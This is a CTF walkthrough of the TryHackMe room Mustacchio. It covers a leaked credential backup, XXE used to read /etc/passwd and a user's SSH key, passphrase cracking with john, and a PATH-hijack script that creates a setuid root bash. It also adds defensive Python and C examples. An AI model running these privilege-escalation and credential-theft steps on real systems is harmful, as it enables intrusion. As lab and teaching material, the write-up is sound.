Mustacchio is an easy-rated Linux room on TryHackMe by zyeinn. A backup file is found on port 80 which contains the login credentials for another webserver on port 8765. That webserver is vulnerable to XXE, through which the private key of a local user is exfiltrated. On the box, a SUID binary is exploited to get root privileges.


Full Port Scan

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ sudo nmap -p- --min-rate 10000 -v -oN nmap/all-ports -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 09:04 +0545
Nmap scan report for
Host is up (0.20s latency).
Not shown: 65533 filtered ports
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 14.13 seconds
           Raw packets sent: 131078 (5.767MB) | Rcvd: 3 (132B)

Detail Scan

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ sudo nmap  -sC -sV -v
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 09:24 +0545
Nmap scan report for
Host is up (0.23s latency).
Not shown: 998 filtered ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA)
|   256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA)
|_  256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry  
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP Service on Port 80

One strange thing on the home page is the copyright date, which is from the future.

Fuzzing with ffuf

All the HTML pages are static. /custom gives us a 301, so let us check that out.

Checking /custom


Backup file inside /custom/js


Downloading the users.bak file

Checking file format

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ file users.bak 
users.bak: SQLite 3.x database, last written using SQLite version 3034001

It is an SQLite database backup.

Contents of the database

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ sqlite3 users.bak
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .dump
PRAGMA foreign_keys=OFF;
        "id"    INTEGER,
        "username"      TEXT,
        "password"      TEXT,
        "role"  INTEGER
INSERT INTO users VALUES(1,'admin','1868e36a********************d4bc5f4b',NULL);

We get a username and a hash.

Trying to crack the hash

Before trying to crack the hash on my own box, I like to search online to see if a match for the hash can be found. And the hash is successfully cracked. Even though we have login credentials, we do not know where to log in. Since SSH is open, let us try whether those credentials work with SSH.

Trying to login with SSH

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ ssh admin@
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:g//RSEsVCZF6FIydF0R24Gmek8fI6D7kRnDXF3fNK9Y.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
admin@ Permission denied (publickey).

Looks like password based authentication is disabled on the box.

Full Port Scan

Since I had used the --min-rate 10000 flag, which sends at least 10000 packets per second, the full port scan may have missed open ports on the box. So let us do another full port scan at only 1000 packets per second.

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ sudo nmap -p- --min-rate 1000
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 09:25 +0545
Nmap scan report for
Host is up (0.24s latency).
Not shown: 65532 filtered ports
22/tcp   open  ssh
80/tcp   open  http
8765/tcp open  ultraseek-http

This time we get another open port.

Visiting the HTTP Service on Port 8765


If we try to login with the earlier obtained credentials, we successfully log in.

Submitting the comment

Interesting Things

  • A URL: /auth/dontforget.bak
  • The user Barry, who is a local user on the box
  • The POST parameter is called xml

Content of the backup file

It contains an XML document. Let us try submitting the same XML in the xml parameter on /home.php.

Checking if we can reflect xml on the page


Our content is reflected in the response. Let us check if this webapp is vulnerable to XXE.

XXE Check

We are able to read the content of /etc/passwd. Apart from root, there are two users on the box which have a login shell.

  • Barry (/home/barry)
  • Joe (/home/joe)
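
Written here as an added example (not the room's /home.php) of how the xml parameter could be handled so that the XXE above is not possible: the parser is told to reject any DOCTYPE or entity declaration outright, and only the expected fields are accepted. The root element name comment and the field names name, author and com are assumptions, as is the use of the standard-library expat parser.

```python
# Added example, not the room's /home.php: a handler for the "xml" POST parameter
# that cannot be abused for XXE. The parser is told to reject any DOCTYPE or
# entity declaration, so internal and external (file://) entities never resolve.
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

ALLOWED_FIELDS = ("name", "author", "com")   # assumed form fields, not taken from the room


class RejectedXML(ValueError):
    """Raised for any document a comment form has no business sending."""


def _forbid_dtd(*_args):
    raise RejectedXML("DTD declarations are not accepted")


def parse_comment(raw):
    """Parse a submitted comment into a dict of allowed fields, or raise RejectedXML."""
    builder = ET.TreeBuilder()
    p = expat.ParserCreate()
    p.StartDoctypeDeclHandler = _forbid_dtd   # fires on "<!DOCTYPE", before any entity
    p.EntityDeclHandler = _forbid_dtd         # second line of defence for the internal subset
    p.StartElementHandler = builder.start
    p.EndElementHandler = builder.end
    p.CharacterDataHandler = builder.data
    try:
        p.Parse(raw, True)
    except expat.ExpatError as exc:           # covers undefined entity references as well
        raise RejectedXML(f"malformed XML: {exc}") from None
    root = builder.close()
    if root.tag != "comment":
        raise RejectedXML("unexpected root element")
    fields = {}
    for child in root:
        if child.tag not in ALLOWED_FIELDS or len(child) > 0:
            raise RejectedXML(f"unexpected element {child.tag!r}")
        fields[child.tag] = (child.text or "").strip()
    return fields


def accepts(raw):
    """True if parse_comment accepts the document; handy for tests and request logging."""
    try:
        parse_comment(raw)
        return True
    except RejectedXML:
        return False
```

Any request that is rejected here is worth logging with the client address, since a comment form never legitimately carries a DTD.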

Since the comment on /home.php hints at the SSH key pair of user barry, let us check if the file is present.

Trying to read barry's private key from the .ssh folder


We can read barry's private SSH key, but it looks like it is encrypted with a passphrase.

We can use ssh2john to try and crack the password.

Using ssh2john to convert into hash

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ /opt/john/john/run/ssh2john.py barry | tee hash

Cracking the hash using john

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ur******es       (barry)     
1g 0:00:00:01 DONE (2021-06-12 10:14) 0.6993g/s 2077Kp/s 2077Kc/s 2077KC/s urieljr.k..urielfabricio07
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Hash is successfully cracked.

Trying to ssh into box as user barry

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ chmod 600 barry 
reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ ssh barry@ -i barry 
Enter passphrase for key 'barry': 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)


barry@mustacchio:~$ id
uid=1003(barry) gid=1003(barry) groups=1003(barry),4(adm)

And we log in successfully. Glancing at the groups, we are in the adm group, which means we can read a few sensitive log files (syslog, auth.log).

Reading user.txt

barry@mustacchio:~$ cat user.txt 

Privilege Escalation

Contents of joe's home directory

A binary is found in joe's home directory which is owned by root and has the setuid bit set. If we manage to find any misconfiguration in this binary, we can probably get code execution as root, since this binary runs with the effective privileges of root.

Downloading the binary

reddevil@ubuntu:~/Documents/tryhackme/mustacchio$ scp -i barry barry@ .
Enter passphrase for key 'barry': 
live_log                                                                                             100%   16KB  37.8KB/s   00:00    

Reversing the binary in Ghidra

The code is pretty simple. It just reads the content of the file /var/log/nginx/access.log.

Since a relative path is used for the tail binary, we may be able to create our own tail binary in the home directory of user joe and get code execution.

Checking if we have write permission

barry@mustacchio:/home/joe$ ls -la
total 28
drwxr-xr-x 2 joe  joe   4096 Apr 29 20:32 .
drwxr-xr-x 4 root root  4096 Apr 29 20:32 ..
-rwsr-xr-x 1 root root 16832 Apr 29 20:32 live_log
barry@mustacchio:/home/joe$ touch tail
touch: cannot touch 'tail': Permission denied

We do not have write permission.

Checking logs

Since we are in the adm group, let us check the log files for anything interesting. Joe's password is in plain text in the log files.

Checking if the password works

barry@mustacchio:/var/log$ su - joe
su: Authentication failure
barry@mustacchio:/var/log$ su - joe
: No such file or directory

If I try the right password, it says No such file or directory, and if I try the wrong password, it says Authentication failure. This means we have the right password but something is wrong with the su binary.

Even though the password works, I cannot find a way to get a shell as user joe.

Path hijacking

Let us create a custom tail binary and try to hijack the path.

Content of tail

barry@mustacchio:/dev/shm$ cat tail 
cp /bin/bash /tmp/bash
chmod 4777 /tmp/bash

Modifying PATH variable

barry@mustacchio:/dev/shm$ export PATH=`pwd`:$PATH

Executing the live_log

barry@mustacchio:/dev/shm$ /home/joe/live_log 
Live Nginx Log Reader

Logs are not shown, which is a good sign.

Checking if /tmp/bash exists

barry@mustacchio:/dev/shm$ ls -la /tmp/bash
-rwsrwxrwx 1 root root 1037528 Jun 12 05:07 /tmp/bash

The binary exists, has the SUID bit set and is owned by root.

Getting a root shell

barry@mustacchio:/dev/shm$ /tmp/bash -p
bash-4.3# id
uid=1003(barry) gid=1003(barry) euid=0(root) groups=1003(barry),4(adm)
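
As an added example, not the room's live_log binary, here is how the same log reader could be written so that the PATH hijack above fails: the helper is resolved only in fixed trusted directories, root is used just to open the log, privileges are dropped before anything else runs, and tail starts with a clean environment. The trusted directory list and the use of tail -f on stdin are assumptions; the log path is the one the room's binary reads.

```c
/* Added example, not the room's live_log: a setuid log reader written so the
 * PATH hijack above fails. tail is looked up only in fixed trusted directories
 * (the caller's PATH is ignored), root is used solely to open the log,
 * privileges are dropped for good, and tail starts with a clean environment. */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define LOGFILE "/var/log/nginx/access.log"   /* the log the room's binary reads */
static const char *const TRUSTED_DIRS[] = { "/usr/bin", "/bin", NULL };
/* Resolve a bare command name inside TRUSTED_DIRS only; names containing '/'
 * are refused so nothing can point at /tmp or ./tail.
 * Returns 0 and fills out on success, -1 otherwise. */
int resolve_trusted_path(const char *name, char *out, size_t outlen)
{
    struct stat st;
    if (name == NULL || *name == '\0' || strchr(name, '/') != NULL)
        return -1;
    for (int i = 0; TRUSTED_DIRS[i] != NULL; i++) {
        int n = snprintf(out, outlen, "%s/%s", TRUSTED_DIRS[i], name);
        if (n < 0 || (size_t)n >= outlen)
            return -1;
        if (stat(out, &st) == 0 && S_ISREG(st.st_mode) && access(out, X_OK) == 0)
            return 0;
    }
    return -1;
}

int main(void)
{
    char tail[256];
    char *const argv[] = { "tail", "-f", NULL };          /* no file operand: reads stdin */
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };  /* nothing inherited from caller */
    if (resolve_trusted_path("tail", tail, sizeof tail) != 0) {
        fputs("tail not found in trusted directories\n", stderr); return 1;
    }
    int fd = open(LOGFILE, O_RDONLY);   /* the only step that needs root */
    if (fd < 0) { perror(LOGFILE); return 1; }
    /* With euid 0, setuid() resets real, effective and saved ids at once. */
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0 || geteuid() != getuid()) {
        fputs("failed to drop privileges\n", stderr); return 1;
    }
    if (dup2(fd, STDIN_FILENO) < 0) { perror("dup2"); return 1; }
    execve(tail, argv, envp);
    perror("execve");                   /* only reached when exec fails */
    return 1;
}
```

Run as an unprivileged user it simply fails at open() if the log is not readable, which is the intended behaviour: nothing after that line ever executes with elevated privileges.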

Reading root.txt

bash-4.3# cat root.txt